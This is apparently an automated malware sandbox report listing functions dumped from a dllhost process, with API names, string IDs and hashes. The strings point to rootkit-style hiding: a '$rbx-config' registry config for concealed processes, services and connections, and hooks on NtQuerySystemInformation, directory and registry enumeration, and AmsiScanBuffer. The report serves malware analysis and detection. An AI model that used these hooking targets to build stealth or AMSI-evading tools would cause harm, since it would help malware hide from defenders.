                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                            • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 3993315683-3414887735
                                            • Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                            • Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
                                            • Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                            • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744
                                            Function 0000020175EE1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3414887735
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: 801eb5a93c501baf003ce120e766e2d95764ebfac4987a6c6fa33191ad0c8344
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: E3714D36320B5085FB509F61E85869CE3A5FB98B88F401122DE4D43B7ADF78C6A4D380
                                            Function 0000020175EB1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3414887735
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: f6e5124794b8ee4fbbc76abbf6521e170402c164b332a269bed817a14fe76b25
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: C1714D36310B5085EB109F61E859A9DF3B6FB88B99F402122DE4D83B3ADF74C664C390
                                            Function 0000020175EE1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: 5f2337ca99f6c51fad71cae724c93e68607f011ef58e23bb3a8b6f5e5f629ca4
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 225179A0124B4AA5FB40EF64EC49BD8E321A758758F949917D40D025B7EFF9C3BAD380
                                            Function 0000020175EB1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: 2d32d4a68c97803afc34837856c5f346cafefa26cc6b117a135a7221827392fd
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 4451A8A0510B8AA5EB08DFA8EC4DBD8E721BB44346F802513941957577DFF9C3BAC3A0
                                            Function 0000020175EE12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 195532ac76688832ce96b74fb770bb0353a0ae24c1b009caba6c0566481437de
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: B0518E32210B849AE764CF62E84835AF7A1F788FD9F444125DE49077A9EF7CC269C740
                                            Function 0000020175EB12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 6773643cd4135b393034aa215551e09541e7fd1903df0961bc9a8014ff95c517
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: 2C515D32210B849AE724CF62E44C76AF7A1F788F99F444125DE4947729EF7CC269C740
                                            Function 0000020175EEEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 2a1540577c5fd60c6a69e652832e491e7bae1597817b3127b48819386d32595d
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 7651C021711B4851FB659F56A8083A9E390BB4CBB0F880725DE3D073E7EFB8D666D640
                                            Function 0000020175EBEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 346a5ce061f7a5577ce12f1099ab2503cf1a127bc3d5e0575ba36058a4326360
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 2451C02170170451EB159F56A808BA9F290BB48BB1F580B259E3D473F2EFB8D666C760
                                            Function 0000020175EE33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: 41399fe78d7e0aa3b741b6368685e9bdc48fdb4c38ac004f0f3ee9675ba0c375
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: FE31CE32A10B4596F721CF12A80875DE3A0F79CF95F440625EE4943A7AEFB8E766C340
                                            Function 0000020175EB33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: 5a9ae2a43a158a2b47f1b8e7fa2cc2d0bd4070aedc18c287428adf2e9539f7b3
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: 7431A732600B4497E721DF12A80C75EE3A1F78CBD5F444625DE4943A36EFB8D666C750
                                            Function 0000020175EE34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: 6702e45fac6de3601c22f6fc68b82caaaba8144ad13dec1b1b045cddd593ae06
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: 10318F31620B458AF750DF22A848759F3E0B79CF96F444125DE8A43776EFB8E766C600
                                            Function 0000020175EB34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: 89e0bb38bb48001ef2e55b8434371a286b1f9315067b2c1976db8720ec864604
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: 99318231611B498AE710DF26B84CB69E3A0F788F96F444125DE8A43B36EFB8C765C710
                                            Function 0000020175E8962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000003.2869389293.0000020175E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020175E80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_3_20175e80000_dllhost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction ID: 4f805535f00e6aa4b24833a22b2318b13165ad00b5f80122bdc222f9bfffeacc
                                            • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction Fuzzy Hash: 54D1B272A44B408AFB60DF65D4883ADF7A0F745798F102115EE8997BA7DFB4E2A1C700
                                            Function 0000020175EEA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: 92593b6122ca06b1e91c303aeaa7d5c85511562bf8a2d035777a9c28afcd4120
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: FAD18E72624B808AFB20DF65D44839DF7A0F74AB98F100119EE8957BA7DFB4C6A5D700
                                            Function 0000020175EBA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: 6df6260a6d2020579997beabf89d0af12c097bd0ce4be470adf387ff7fe505b5
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: 73D1B172604B808AEF61DF65D448B9DF7A0F745B89F100215EE8957BABDFB4C6A0C710
                                            Function 000000014000104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                            • Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
                                            • Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                            • Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                            Function 0000020175EE104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 0cbe54d75748d27415916f089b66c89371f0ebafd91c48e06236c34af6ff9a27
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: 65416373214B84D6E7A4CF21E44879EF7A1F388B98F448115DB8907768EF78D695CB40
                                            Function 0000020175EB104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
